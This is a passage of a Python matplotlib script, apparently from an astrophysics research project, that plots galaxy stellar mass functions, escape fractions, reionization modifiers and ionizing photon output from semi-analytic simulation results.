leg.draw_frame(False) # Don't want a box frame
for t in leg.get_texts(): # Reduce the size of the text
t.set_fontsize(PlotScripts.global_legendsize)
outputFile = './%s%s' %(output_tag, output_format)
plt.savefig(outputFile, bbox_inches='tight') # Save the figure
print('Saved file to {0}'.format(outputFile))
plt.close()
if (paper_plot == 1):
fig, ax = plt.subplots(nrows=1, ncols=3, sharex=False, sharey=True, figsize=(16, 6))
delta_fontsize = 0
caps = 5
ewidth = 1.5
for model_number in range(0, len(SnapList)):
for count in range(len(SnapList[model_number])):
w = np.where((counts_array[model_number][count] > 0))[0]
ax[count].plot(bin_middle_array[model_number][count][w], counts_array[model_number][count][w]
/ normalization_array[model_number], color = PlotScripts.colors[model_number],
linestyle = PlotScripts.linestyles[model_number], rasterized = True,
label = r"$\mathbf{SAGE}$", linewidth = PlotScripts.global_linewidth)
tick_locs = np.arange(6.0, 12.0)
ax[count].set_xticklabels([r"$\mathbf{%d}$" % x for x in tick_locs], fontsize = PlotScripts.global_fontsize)
ax[count].set_xlim([6.8, 10.3])
ax[count].tick_params(which = 'both', direction='in',
width = PlotScripts.global_tickwidth)
ax[count].tick_params(which = 'major', length = PlotScripts.global_ticklength)
ax[count].tick_params(which = 'minor', length = PlotScripts.global_ticklength-2)
ax[count].set_xlabel(r'$\mathbf{log_{10} \: M_{*} \:[M_{\odot}]}$',
fontsize = PlotScripts.global_labelsize - delta_fontsize)
ax[count].xaxis.set_minor_locator(plt.MultipleLocator(0.25))
#ax[count].set_xticks(np.arange(6.0, 12.0))
for axis in ['top','bottom','left','right']: # Adjust axis thickness.
ax[count].spines[axis].set_linewidth(PlotScripts.global_axiswidth)
# Since y-axis is shared, only need to do this once.
ax[0].set_yscale('log', nonposy='clip')
ax[0].set_yticklabels([r"$\mathbf{10^{-5}}$",r"$\mathbf{10^{-5}}$",r"$\mathbf{10^{-4}}$", r"$\mathbf{10^{-3}}$",
r"$\mathbf{10^{-2}}$",r"$\mathbf{10^{-1}}$"])
ax[0].set_ylim([1e-5, 1e-1])
#ax[0].set_ylabel(r'\mathbf{$\log_{10} \Phi\ [\mathrm{Mpc}^{-3}\: \mathrm{dex}^{-1}]}$',
ax[0].set_ylabel(r'$\mathbf{log_{10} \: \Phi\ [Mpc^{-3}\: dex^{-1}]}$',
fontsize = PlotScripts.global_labelsize - delta_fontsize)
Obs.Get_Data_SMF()
PlotScripts.Plot_SMF_z6(ax[0], errorwidth=ewidth, capsize=caps)
PlotScripts.Plot_SMF_z7(ax[1], errorwidth=ewidth, capsize=caps)
PlotScripts.Plot_SMF_z8(ax[2], errorwidth=ewidth, capsize=caps)
####
ax[0].text(0.7, 0.9, r"$\mathbf{z = 6}$", transform = ax[0].transAxes, fontsize = PlotScripts.global_fontsize - delta_fontsize)
ax[1].text(0.7, 0.9, r"$\mathbf{z = 7}$", transform = ax[1].transAxes, fontsize = PlotScripts.global_fontsize - delta_fontsize)
ax[2].text(0.7, 0.9, r"$\mathbf{z = 8}$", transform = ax[2].transAxes, fontsize = PlotScripts.global_fontsize - delta_fontsize)
#leg = ax[0,0].legend(loc=2, bbox_to_anchor = (0.2, -0.5), numpoints=1, labelspacing=0.1)
leg = ax[0].legend(loc='lower left', numpoints=1, labelspacing=0.1)
leg.draw_frame(False) # Don't want a box frame
for t in leg.get_texts(): # Reduce the size of the text
t.set_fontsize(PlotScripts.global_legendsize - 2)
plt.tight_layout()
outputFile = "{0}_paper{1}".format(output_tag, output_format)
plt.savefig(outputFile, bbox_inches='tight') # Save the figure
print('Saved file to {0}'.format(outputFile))
plt.close()
##
def plot_fesc_galaxy(SnapList, PlotSnapList, simulation_norm,
mean_galaxy_fesc, std_galaxy_fesc, N_galaxy_fesc,
mean_halo_fesc, std_halo_fesc, N_halo_fesc,
ResolutionLimit_mean, model_tags, paper_plots,
mass_global, fesc_global, Ngamma_global, output_tag):
"""
Plots the escape fraction as a function of stellar/halo mass.
Parallel compatible.
Accepts 3D arrays of the escape fraction binned into Stellar Mass bins to plot the escape fraction for multiple models.
Mass units are log(Msun)
Parameters
---------
SnapList : Nested array, SnapList[model_number0] = [snapshot0_model0, ..., snapshotN_model0], with length equal to the number of models.
Snapshots for each model.
simulation_norm : array with length equal to the number of models.
Denotes which simulation each model uses.
0 : MySim
1 : Mini-Millennium
2 : Tiamat (down to z = 5)
3 : Extended Tiamat (down to z = 1.6ish).
4 : Britton's Simulation
5 : Kali
mean_galaxy_fesc, std_galaxy_fesc, N_galaxy_fesc : Nested 3-dimensional array, mean_galaxy_fesc[model_number0][snapshot0] = [bin0_meanfesc, ..., binN_meanfesc], with length equal to the number of models.
Mean/Standard deviation for fesc in each stellar mass bin, for each [model_number] and [snapshot_number]. N_galaxy_fesc is the number of galaxies placed into each mass bin.
mean_halo_fesc, std_halo_fesc, N_halo_fesc Nested 3-dimensional array, mean_halo_fesc[model_number0][snapshot0] = [bin0_meanfesc, ..., binN_meanfesc], with length equal to the number of models.
Identical to previous except using the halo virial mass for the binning rather than stellar mass.
ResolutionLimit_mean : array of floats with the same shape as mean_galaxy_fesc.
This is the mean stellar mass for a halo with len (number of N-body simulation particles) between 'stellar_mass_halolen_lower' and 'stellar_mass_halolen_upper'.
model_tags : array of strings with length equal to the number of models.
Strings that contain the tag for each model. Will be placed on the plot.
paper_plots: Integer.
Flag to denote whether we should plot a full, 4 panel plot for the
RSAGE paper.
output_tag : string
Name of the file that will be generated.
Returns
-------
No returns.
Generates and saves the plot (named via output_tag).
Units
-----
Mass units are log(Msun).
"""
def adjust_stellarmass_plot(ax):
#ax.axhline(0.20, 0, 100, color ='k', linewidth = PlotScripts.global_linewidth, linestyle = '-.')
#ax.text(7.8, 0.22, r"$f_\mathrm{esc, base}$", color = 'k',
# size = PlotScripts.global_fontsize)
ax.set_xlabel(r'$\mathbf{log_{10} \: M_{*} \:[M_{\odot}]}$',
size = PlotScripts.global_fontsize)
ax.set_ylabel(r'$\mathbf{\langle f_{esc}\rangle_{M_*}}$',
size = PlotScripts.global_labelsize)
ax.set_xlim([6.8, 10])
ax.set_ylim([0.05, 0.45])
#ax.axhline(0.35, 0, 100, color ='k', linewidth = PlotScripts.global_linewidth, linestyle = '-.')
#ax.text(9.1, 0.37, r"$f_\mathrm{esc} = 0.35$", color = 'k',
# size = PlotScripts.global_fontsize)
ax.xaxis.set_minor_locator(mtick.MultipleLocator(0.25))
ax.yaxis.set_minor_locator(mtick.MultipleLocator(0.05))
ax.tick_params(which = 'both', direction='in', width =
PlotScripts.global_tickwidth)
ax.tick_params(which = 'major', length = PlotScripts.global_ticklength)
ax.tick_params(which = 'minor', length = PlotScripts.global_ticklength-2)
for axis in ['top','bottom','left','right']: # Adjust axis thickness.
ax.spines[axis].set_linewidth(PlotScripts.global_axiswidth)
tick_locs = np.arange(6.0, 11.0)
ax.set_xticklabels([r"$\mathbf{%d}$" % x for x in tick_locs],
fontsize = PlotScripts.global_fontsize)
tick_locs = np.arange(0.0, 0.80, 0.10)
ax.set_yticklabels([r"$\mathbf{%.2f}$" % x for x in tick_locs],
fontsize = PlotScripts.global_fontsize)
'''
labels = ax.yaxis.get_ticklabels()
locs = ax.yaxis.get_ticklocs()
for label, loc in zip(labels, locs):
print("{0} {1}".format(label, loc))
'''
leg = ax.legend(loc="upper right", numpoints=1, labelspacing=0.1)
leg.draw_frame(False) # Don't want a box frame
for t in leg.get_texts(): # Reduce the size of the text
t.set_fontsize('medium')
def adjust_paper_plots(ax, model_tags):
ax[1,0].set_xlabel(r'$\mathbf{log_{10} \: M_{*} \:[M_{\odot}]}$',
size = PlotScripts.global_fontsize)
ax[1,1].set_xlabel(r'$\mathbf{log_{10} \: M_{*} \:[M_{\odot}]}$',
size = PlotScripts.global_fontsize)
ax[0,0].set_ylabel(r'$\mathbf{\langle f_{esc}\rangle_{M_*}}$',
size = PlotScripts.global_labelsize)
ax[1,0].set_ylabel(r'$\mathbf{\langle f_{esc}\rangle_{M_*}}$',
size = PlotScripts.global_labelsize)
ax_x = [0, 0, 1, 1]
ax_y = [0, 1, 0, 1]
for count, (x, y) in enumerate(zip(ax_x, ax_y)):
ax[x,y].set_xlim([4.8, 10.4])
ax[x,y].set_ylim([0.00, 0.68])
ax[x,y].yaxis.set_major_locator(mtick.MultipleLocator(0.1))
ax[x,y].xaxis.set_major_locator(mtick.MultipleLocator(1.0))
ax[x,y].yaxis.set_minor_locator(mtick.MultipleLocator(0.05))
ax[x,y].xaxis.set_minor_locator(mtick.MultipleLocator(0.25))
ax[x,y].tick_params(which = 'both', direction='in', width =
PlotScripts.global_tickwidth)
ax[x,y].tick_params(which = 'major', length = PlotScripts.global_ticklength)
ax[x,y].tick_params(which = 'minor',
length = PlotScripts.global_ticklength - 2)
for axis in ['top','bottom','left','right']: # Adjust axis thickness.
ax[x,y].spines[axis].set_linewidth(PlotScripts.global_axiswidth)
print(model_tags[count])
label = model_tags[count]
ax[x,y].text(0.05, 0.65, label, transform = ax[x,y].transAxes, fontsize = PlotScripts.global_fontsize - delta_fontsize)
tick_locs = np.arange(4.0, 11.0)
ax[1,0].set_xticklabels([r"$\mathbf{%d}$" % x for x in tick_locs],
fontsize = PlotScripts.global_fontsize)
ax[1,1].set_xticklabels([r"$\mathbf{%d}$" % x for x in tick_locs],
fontsize = PlotScripts.global_fontsize)
tick_locs = np.arange(-0.1, 0.80, 0.10)
ax[0,0].set_yticklabels([r"$\mathbf{%.2f}$" % x for x in tick_locs],
fontsize = PlotScripts.global_fontsize)
ax[1,0].set_yticklabels([r"$\mathbf{%.2f}$" % x for x in tick_locs],
fontsize = PlotScripts.global_fontsize)
print("x")
labels = ax[1,0].xaxis.get_ticklabels()
locs = ax[1,0].xaxis.get_ticklocs()
for label, loc in zip(labels, locs):
print("{0} {1}".format(label, loc))
print("y")
labels = ax[1,0].yaxis.get_ticklabels()
locs = ax[1,0].yaxis.get_ticklocs()
for label, loc in zip(labels, locs):
print("{0} {1}".format(label, loc))
print("Plotting fesc as a function of stellar mass.")
## Array initialization ##
master_mean_fesc_stellar, master_std_fesc_stellar, master_N_fesc_stellar, master_bin_middle_stellar = \
collect_across_tasks(mean_galaxy_fesc, std_galaxy_fesc, N_galaxy_fesc,
SnapList, PlotSnapList, True, m_gal_low, m_gal_high)
if rank == 0:
if paper_plots == 0:
fig = plt.figure()
ax1 = fig.add_subplot(111)
else:
fig, ax = plt.subplots(nrows=2, ncols=2, sharex='col', sharey='row', figsize=(16, 6))
fig2, ax2 = plt.subplots(nrows=2, ncols=2, sharex='col', sharey='row', figsize=(16, 6))
delta_fontsize = 0
caps = 5
ewidth = 1.5
count_x = 0
for count, model_number in enumerate(range(0, len(SnapList))):
if count == 2:
count_x += 1
print("There were a total of {0} galaxies over the entire redshift range.".format(sum(N_halo_fesc[model_number])))
## Normalization for each model. ##
if (simulation_norm[model_number] == 0):
AllVars.Set_Params_Mysim()
elif (simulation_norm[model_number] == 1):
AllVars.Set_Params_MiniMill()
elif (simulation_norm[model_number] == 2):
AllVars.Set_Params_Tiamat()
elif (simulation_norm[model_number] == 3):
AllVars.Set_Params_Tiamat_extended()
elif (simulation_norm[model_number] == 4):
AllVars.Set_Params_Britton()
elif(simulation_norm[model_number] == 5):
AllVars.Set_Params_Kali()
plot_count = 0
for snapshot_idx in range(0, len(SnapList[model_number])):
if (SnapList[model_number][snapshot_idx] == PlotSnapList[model_number][plot_count]):
if (model_number == 0):
label = r"$\mathbf{z = " + \
str(int(round(AllVars.SnapZ[SnapList[model_number][snapshot_idx]]))) +\
"}$"
else:
label = ""
## Plots as a function of stellar mass ##
w = np.where((master_N_fesc_stellar[model_number][snapshot_idx] < 4))[0] # If there are no galaxies in the bin we don't want to plot.
master_mean_fesc_stellar[model_number][snapshot_idx][w] = np.nan
if paper_plots == 0:
print(master_mean_fesc_stellar[model_number][snapshot_idx])
ax1.plot(master_bin_middle_stellar[model_number][snapshot_idx],
master_mean_fesc_stellar[model_number][snapshot_idx],
color = PlotScripts.colors[plot_count],
ls = PlotScripts.linestyles[model_number],
rasterized = True, label = label,
lw = PlotScripts.global_linewidth)
else:
ax[count_x, count%2].plot(master_bin_middle_stellar[model_number][snapshot_idx],
master_mean_fesc_stellar[model_number][snapshot_idx],
color = PlotScripts.colors[plot_count],
ls = PlotScripts.linestyles[0],
rasterized = True, label = label,
lw = PlotScripts.global_linewidth)
#w = np.random.randint(0,
# len(mass_global[model_number][snapshot_idx][0]),
# size=500)
#sc = ax2[count_x, count%2].scatter(mass_global[model_number][snapshot_idx][0][w],
# fesc_global[model_number][snapshot_idx][0][w],
# c=np.log10(Ngamma_global[model_number][snapshot_idx][0][w]*1.0e50),
# alpha = 0.5,cmap='plasma')
#plt.colorbar(sc)
#ax2[count_x, count%2].hexbin(mass_global[model_number][snapshot_idx],
# fesc_global[model_number][snapshot_idx],
# C=Ngamma_global[model_number][snapshot_idx])
plot_count += 1
if (plot_count == len(PlotSnapList[model_number])):
break
## Stellar Mass plots ##
if paper_plots == 0:
adjust_stellarmass_plot(ax1)
else:
adjust_paper_plots(ax, model_tags)
leg = ax[0,0].legend(loc="upper right", numpoints=1, labelspacing=0.1)
leg.draw_frame(False) # Don't want a box frame
for t in leg.get_texts(): # Reduce the size of the text
t.set_fontsize('medium')
plt.tight_layout()
plt.subplots_adjust(wspace = 0.0, hspace = 0.0)
#leg = ax2[0,0].legend(loc="upper right", numpoints=1, labelspacing=0.1)
#leg.draw_frame(False) # Don't want a box frame
#for t in leg.get_texts(): # Reduce the size of the text
# t.set_fontsize('medium')
plt.tight_layout()
plt.subplots_adjust(wspace = 0.0, hspace = 0.0)
## Output ##
outputFile = './%s%s' %(output_tag, output_format)
fig.savefig(outputFile, bbox_inches='tight') # Save the figure
print('Saved file to {0}'.format(outputFile))
plt.close(fig)
if paper_plots == 1:
outputFile = './%s_scatter%s' %(output_tag, output_format)
fig2.savefig(outputFile, bbox_inches='tight') # Save the figure
print('Saved file to {0}'.format(outputFile))
plt.close(fig2)
##
def plot_reionmod_galaxy(SnapList, PlotSnapList, simulation_norm,
mean_galaxy_reionmod, std_galaxy_reionmod, N_galaxy_reionmod,
mean_galaxy_reionmod_gnedin, std_galaxy_reionmod_gnedin,
model_tags, paper_plots, output_tag):
"""
"""
def adjust_paper_plots(ax, model_tags):
ax[1,0].set_xlabel(r'$\mathbf{log_{10} \: M_{*} \:[M_{\odot}]}$',
size = PlotScripts.global_fontsize)
ax[1,1].set_xlabel(r'$\mathbf{log_{10} \: M_{*} \:[M_{\odot}]}$',
size = PlotScripts.global_fontsize)
ax[0,0].set_ylabel(r'$\mathbf{\langle ReionMod\rangle_{M_*}}$',
size = PlotScripts.global_labelsize)
ax[1,0].set_ylabel(r'$\mathbf{\langle ReionMod\rangle_{M_*}}$',
size = PlotScripts.global_labelsize)
ax_x = [0, 0, 1, 1]
ax_y = [0, 1, 0, 1]
for count, (x, y) in enumerate(zip(ax_x, ax_y)):
ax[x,y].set_xlim([4.8, 10.4])
ax[x,y].set_ylim([0.00, 1.05])
#ax[x,y].yaxis.set_major_locator(mtick.MultipleLocator(0.1))
ax[x,y].xaxis.set_major_locator(mtick.MultipleLocator(1.0))
#ax[x,y].yaxis.set_minor_locator(mtick.MultipleLocator(0.05))
ax[x,y].xaxis.set_minor_locator(mtick.MultipleLocator(0.25))
ax[x,y].tick_params(which = 'both', direction='in', width =
PlotScripts.global_tickwidth)
ax[x,y].tick_params(which = 'major', length = PlotScripts.global_ticklength)
ax[x,y].tick_params(which = 'minor',
length = PlotScripts.global_ticklength - 2)
for axis in ['top','bottom','left','right']: # Adjust axis thickness.
ax[x,y].spines[axis].set_linewidth(PlotScripts.global_axiswidth)
print(model_tags[count])
label = model_tags[count]
ax[x,y].text(0.05, 0.65, label, transform = ax[x,y].transAxes, fontsize = PlotScripts.global_fontsize - delta_fontsize)
tick_locs = np.arange(4.0, 11.0)
ax[1,0].set_xticklabels([r"$\mathbf{%d}$" % x for x in tick_locs],
fontsize = PlotScripts.global_fontsize)
ax[1,1].set_xticklabels([r"$\mathbf{%d}$" % x for x in tick_locs],
fontsize = PlotScripts.global_fontsize)
#tick_locs = np.arange(-0.1, 0.80, 0.10)
#ax[0,0].set_yticklabels([r"$\mathbf{%.2f}$" % x for x in tick_locs],
#fontsize = PlotScripts.global_fontsize)
#ax[1,0].set_yticklabels([r"$\mathbf{%.2f}$" % x for x in tick_locs],
# fontsize = PlotScripts.global_fontsize)
def adjust_redshift_panels(ax, redshift_tags):
ax[1,0].set_xlabel(r'$\mathbf{log_{10} \: M_{*} \:[M_{\odot}]}$',
size = PlotScripts.global_fontsize)
ax[1,1].set_xlabel(r'$\mathbf{log_{10} \: M_{*} \:[M_{\odot}]}$',
size = PlotScripts.global_fontsize)
ax[0,0].set_ylabel(r'$\mathbf{\langle ReionMod\rangle_{M_*}}$',
size = PlotScripts.global_labelsize)
ax[1,0].set_ylabel(r'$\mathbf{\langle ReionMod\rangle_{M_*}}$',
size = PlotScripts.global_labelsize)
ax_x = [0, 0, 1, 1]
ax_y = [0, 1, 0, 1]
for count, (x, y) in enumerate(zip(ax_x, ax_y)):
ax[x,y].set_xlim([4.8, 10.4])
ax[x,y].set_ylim([0.00, 1.05])
#ax[x,y].yaxis.set_major_locator(mtick.MultipleLocator(0.1))
ax[x,y].xaxis.set_major_locator(mtick.MultipleLocator(1.0))
#ax[x,y].yaxis.set_minor_locator(mtick.MultipleLocator(0.05))
ax[x,y].xaxis.set_minor_locator(mtick.MultipleLocator(0.25))
ax[x,y].tick_params(which = 'both', direction='in', width =
PlotScripts.global_tickwidth)
ax[x,y].tick_params(which = 'major', length = PlotScripts.global_ticklength)
ax[x,y].tick_params(which = 'minor',
length = PlotScripts.global_ticklength - 2)
for axis in ['top','bottom','left','right']: # Adjust axis thickness.
ax[x,y].spines[axis].set_linewidth(PlotScripts.global_axiswidth)
label = redshift_tags[count]
ax[x,y].text(0.05, 0.65, label, transform = ax[x,y].transAxes, fontsize = PlotScripts.global_fontsize - delta_fontsize)
tick_locs = np.arange(4.0, 11.0)
ax[1,0].set_xticklabels([r"$\mathbf{%d}$" % x for x in tick_locs],
fontsize = PlotScripts.global_fontsize)
ax[1,1].set_xticklabels([r"$\mathbf{%d}$" % x for x in tick_locs],
fontsize = PlotScripts.global_fontsize)
print("Reionization Modifier as a function of stellar mass.")
## Array initialization ##
master_mean_reionmod_stellar, master_std_reionmod_stellar, master_N_reionmod_stellar, master_bin_middle_stellar = \
collect_across_tasks(mean_galaxy_reionmod, std_galaxy_reionmod, N_galaxy_reionmod,
SnapList, PlotSnapList, True, m_gal_low, m_gal_high)
master_mean_reionmod_gnedin_stellar, master_std_reionmod_gnedin_stellar, master_N_reionmod_gnedin_stellar, master_bin_middle_stellar = \
collect_across_tasks(mean_galaxy_reionmod_gnedin, std_galaxy_reionmod_gnedin, N_galaxy_reionmod,
SnapList, PlotSnapList, True, m_gal_low, m_gal_high)
if rank == 0:
if paper_plots == 0:
fig = plt.figure()
ax1 = fig.add_subplot(111)
else:
fig, ax = plt.subplots(nrows=2, ncols=2, sharex='col', sharey='row', figsize=(16, 6))
fig2, ax2 = plt.subplots(nrows=2, ncols=2, sharex='col', sharey='row', figsize=(16, 6))
delta_fontsize = 0
caps = 5
ewidth = 1.5
count_x = 0
for count, model_number in enumerate(range(0, len(SnapList))):
if count == 2:
count_x += 1
plot_count = 0
for snapshot_idx in range(0, len(SnapList[model_number])):
if (SnapList[model_number][snapshot_idx] == PlotSnapList[model_number][plot_count]):
if (model_number == 0):
label = r"$\mathbf{z = " + \
str(int(round(AllVars.SnapZ[SnapList[model_number][snapshot_idx]]))) +\
"}$"
else:
label = ""
## Plots as a function of stellar mass ##
w = np.where((master_N_reionmod_stellar[model_number][snapshot_idx] < 4))[0] # If there are no galaxies in the bin we don't want to plot.
master_mean_reionmod_stellar[model_number][snapshot_idx][w] = np.nan
master_mean_reionmod_gnedin_stellar[model_number][snapshot_idx][w] = np.nan
if paper_plots == 0:
ax1.plot(master_bin_middle_stellar[model_number][snapshot_idx],
master_mean_reionmod_stellar[model_number][snapshot_idx],
color = PlotScripts.colors[plot_count],
ls = PlotScripts.linestyles[model_number],
rasterized = True, label = label,
lw = PlotScripts.global_linewidth)
else:
ax[count_x, count%2].plot(master_bin_middle_stellar[model_number][snapshot_idx],
master_mean_reionmod_stellar[model_number][snapshot_idx],
color = PlotScripts.colors[plot_count],
ls = PlotScripts.linestyles[0],
rasterized = True, label = label,
lw = PlotScripts.global_linewidth)
ax[count_x, count%2].plot(master_bin_middle_stellar[model_number][snapshot_idx],
master_mean_reionmod_gnedin_stellar[model_number][snapshot_idx],
color = PlotScripts.colors[plot_count],
ls = PlotScripts.linestyles[1],
rasterized = True, label = label,
lw = PlotScripts.global_linewidth)
plot_count += 1
if (plot_count == len(PlotSnapList[model_number])):
break
z_labels = []
for model_number in range(0, len(SnapList)):
count_x = 0
plot_count = 0
for count, snapshot_idx in enumerate(range(len(SnapList[model_number]))):
if count == 2:
count_x += 1
if (SnapList[model_number][snapshot_idx] == PlotSnapList[model_number][plot_count]):
label = model_tags[model_number]
if (model_number == 0):
z_label = r"$\mathbf{z = " + \
str(int(round(AllVars.SnapZ[SnapList[model_number][snapshot_idx]]))) +\
"}$"
z_labels.append(z_label)
## Plots as a function of stellar mass ##
w = np.where((master_N_reionmod_stellar[model_number][snapshot_idx] < 4))[0] # If there are no galaxies in the bin we don't want to plot.
master_mean_reionmod_stellar[model_number][snapshot_idx][w] = np.nan
master_mean_reionmod_gnedin_stellar[model_number][snapshot_idx][w] = np.nan
if (model_number == 0):
print(master_mean_reionmod_stellar[model_number][snapshot_idx])
ax2[count_x, count%2].plot(master_bin_middle_stellar[model_number][snapshot_idx],
master_mean_reionmod_stellar[model_number][snapshot_idx],
color = PlotScripts.colors[model_number],
ls = PlotScripts.linestyles[model_number],
rasterized = True, label = label,
lw = PlotScripts.global_linewidth)
if (model_number == 0):
ax2[count_x, count%2].plot(master_bin_middle_stellar[model_number][snapshot_idx],
master_mean_reionmod_gnedin_stellar[model_number][snapshot_idx],
color = 'k',
ls = '--',
rasterized = True, label = "Gnedin",
lw = PlotScripts.global_linewidth)
plot_count += 1
if (plot_count == len(PlotSnapList[model_number])):
break
## Stellar Mass plots ##
if paper_plots == 0:
adjust_stellarmass_plot(ax1)
else:
adjust_paper_plots(ax, model_tags)
print(z_labels)
adjust_redshift_panels(ax2, z_labels)
leg = ax[0,0].legend(loc="upper right", numpoints=1, labelspacing=0.1)
leg.draw_frame(False) # Don't want a box frame
for t in leg.get_texts(): # Reduce the size of the text
t.set_fontsize('medium')
leg = ax2[0,0].legend(loc="upper right", numpoints=1, labelspacing=0.1)
leg.draw_frame(False) # Don't want a box frame
for t in leg.get_texts(): # Reduce the size of the text
t.set_fontsize('medium')
plt.tight_layout()
plt.subplots_adjust(wspace = 0.0, hspace = 0.0)
#leg = ax2[0,0].legend(loc="upper right", numpoints=1, labelspacing=0.1)
#leg.draw_frame(False) # Don't want a box frame
#for t in leg.get_texts(): # Reduce the size of the text
# t.set_fontsize('medium')
plt.tight_layout()
plt.subplots_adjust(wspace = 0.0, hspace = 0.0)
## Output ##
outputFile = "{0}{1}".format(output_tag, output_format)
fig.savefig(outputFile, bbox_inches='tight') # Save the figure
print('Saved file to {0}'.format(outputFile))
plt.close(fig)
outputFile2 = "{0}_redshiftpanels{1}".format(output_tag, output_format)
fig2.savefig(outputFile2, bbox_inches='tight') # Save the figure
print('Saved file to {0}'.format(outputFile2))
plt.close(fig2)
##
def plot_nion_galaxy(SnapList, PlotSnapList, simulation_norm,
mean_Ngamma_galaxy, std_Ngamma_galaxy, N_Ngamma_galaxy,
model_tags, paper_plots, output_tag):
"""
Plots the number of ionizing photons emitted (not necessarily escaped) as a
function of galaxy stellar mass.
Parallel compatible.
Accepts 3D arrays of the escape fraction binned into Stellar Mass bins to plot the escape fraction for multiple models.
Mass units are log(Msun)
Parameters
---------
SnapList : Nested array, SnapList[model_number0] = [snapshot0_model0, ..., snapshotN_model0], with length equal to the number of models.
Snapshots for each model.
simulation_norm : array with length equal to the number of models.
Denotes which simulation each model uses.
0 : MySim
1 : Mini-Millennium
2 : Tiamat (down to z = 5)
3 : Extended Tiamat (down to z = 1.6ish).
4 : Britton's Simulation
5 : Kali
mean_galaxy_Ngamma, std_galaxy_Ngamma, N_galaxy_Ngamma : Nested
3-dimensional array, mean_galaxy_Ngamma[model_number0][snapshot0] = [bin0_meanNgamma, ..., binN_meanNgamma], with length equal to the number of models.
Mean/Standard deviation for Ngamma in each stellar mass bin, for each
[model_number] and [snapshot_number]. N_galaxy_Ngamma is the number
of galaxies placed into each mass bin.
model_tags : array of strings with length equal to the number of models.
Strings that contain the tag for each model. Will be placed on the plot.
paper_plots: Integer.
Flag to denote whether we should plot a full, 4 panel plot for the
RSAGE paper.
output_tag : string
Name of the file that will be generated.
Returns
-------
No returns.
Generates and saves the plot (named via output_tag).
Units
-----
Mass units are log(Msun).
Ngamma units are 1.0e50 photons/s.
"""
def adjust_stellarmass_plot(ax):
#ax.axhline(0.20, 0, 100, color ='k', linewidth = PlotScripts.global_linewidth, linestyle = '-.')
#ax.text(7.8, 0.22, r"$f_\mathrm{esc, base}$", color = 'k',
# size = PlotScripts.global_fontsize)
ax.set_xlabel(r'$\mathbf{log_{10} \: M_{*} \:[M_{\odot}]}$',
size = PlotScripts.global_fontsize)
ax.set_ylabel(r'$\mathbf{\log_{10}\langle f_{esc} N_\gamma\rangle_{M_*}}$',
size = PlotScripts.global_labelsize)
ax.set_xlim([6.8, 10])
#ax.set_ylim([0.05, 0.45])
#ax.axhline(0.35, 0, 100, color ='k', linewidth = PlotScripts.global_linewidth, linestyle = '-.')
#ax.text(9.1, 0.37, r"$f_\mathrm{esc} = 0.35$", color = 'k',
# size = PlotScripts.global_fontsize)
ax.xaxis.set_minor_locator(mtick.MultipleLocator(0.25))
#ax.yaxis.set_minor_locator(mtick.MultipleLocator(0.05))
ax.tick_params(which = 'both', direction='in', width =
PlotScripts.global_tickwidth)
ax.tick_params(which = 'major', length = PlotScripts.global_ticklength)
ax.tick_params(which = 'minor', length = PlotScripts.global_ticklength-2)
for axis in ['top','bottom','left','right']: # Adjust axis thickness.
ax.spines[axis].set_linewidth(PlotScripts.global_axiswidth)
tick_locs = np.arange(6.0, 11.0)
ax.set_xticklabels([r"$\mathbf{%d}$" % x for x in tick_locs],
fontsize = PlotScripts.global_fontsize)
#tick_locs = np.arange(0.0, 0.80, 0.10)
#ax.set_yticklabels([r"$\mathbf{%.2f}$" % x for x in tick_locs],
# fontsize = PlotScripts.global_fontsize)
'''
labels = ax.yaxis.get_ticklabels()
locs = ax.yaxis.get_ticklocs()
for label, loc in zip(labels, locs):
print("{0} {1}".format(label, loc))
'''
leg = ax.legend(loc="upper right", numpoints=1, labelspacing=0.1)
leg.draw_frame(False) # Don't want a box frame
for t in leg.get_texts(): # Reduce the size of the text
t.set_fontsize('medium')
def adjust_paper_plots(ax, z_tags):
ax[1,0].set_xlabel(r'$\mathbf{log_{10} \: M_{*} \:[M_{\odot}]}$',
size = PlotScripts.global_fontsize)
ax[1,1].set_xlabel(r'$\mathbf{log_{10} \: M_{*} \:[M_{\odot}]}$',
size = PlotScripts.global_fontsize)
ax[0,0].set_ylabel(r'$\mathbf{\Sigma log_{10}\langle f_{esc} N_\gamma\rangle_{M_*}}$',
size = PlotScripts.global_labelsize - 10)
ax[1,0].set_ylabel(r'$\mathbf{\Sigma log_{10}\langle f_{esc} N_\gamma\rangle_{M_*}}$',
size = PlotScripts.global_labelsize - 10)
ax_x = [0, 0, 1, 1]
ax_y = [0, 1, 0, 1]
for count, (x, y) in enumerate(zip(ax_x, ax_y)):
ax[x,y].set_xlim([4.8, 10.4])
ax[x,y].set_ylim([47, 55])
#ax[x,y].yaxis.set_major_locator(mtick.MultipleLocator(0.1))
ax[x,y].xaxis.set_major_locator(mtick.MultipleLocator(1.0))
#ax[x,y].yaxis.set_minor_locator(mtick.MultipleLocator(0.05))
ax[x,y].xaxis.set_minor_locator(mtick.MultipleLocator(0.25))
ax[x,y].tick_params(which = 'both', direction='in', width =
PlotScripts.global_tickwidth)
ax[x,y].tick_params(which = 'major', length = PlotScripts.global_ticklength)
for axis in ['top','bottom','left','right']: # Adjust axis thickness.
ax[x,y].spines[axis].set_linewidth(PlotScripts.global_axiswidth)
print(z_tags[count])
label = r"$\mathbf{z = " + \
str(int(round(float(z_tags[count])))) +\
"}$"
ax[x,y].text(0.7, 0.8, label, transform = ax[x,y].transAxes, fontsize = PlotScripts.global_fontsize - delta_fontsize)
tick_locs = np.arange(4.0, 11.0)
ax[1,0].set_xticklabels([r"$\mathbf{%d}$" % x for x in tick_locs],
fontsize = PlotScripts.global_fontsize)
ax[1,1].set_xticklabels([r"$\mathbf{%d}$" % x for x in tick_locs],
fontsize = PlotScripts.global_fontsize)
#tick_locs = np.arange(0.0, 0.80, 0.10)
#ax[0,0].set_yticklabels([r"$\mathbf{%.2f}$" % x for x in tick_locs],
# fontsize = PlotScripts.global_fontsize)
#ax[1,0].set_yticklabels([r"$\mathbf{%.2f}$" % x for x in tick_locs],
# fontsize = PlotScripts.global_fontsize)
print("x")
labels = ax[1,0].xaxis.get_ticklabels()
locs = ax[1,0].xaxis.get_ticklocs()
for label, loc in zip(labels, locs):
print("{0} {1}".format(label, loc))
print("y")
labels = ax[1,0].yaxis.get_ticklabels()
locs = ax[1,0].yaxis.get_ticklocs()
for label, loc in zip(labels, locs):
print("{0} {1}".format(label, loc))
print("Plotting Ngamma*fesc as a function of stellar mass.")
## Array initialization ##
master_mean_Ngamma_stellar, master_std_Ngamma_stellar, master_N_Ngamma_stellar, master_bin_middle_stellar = \
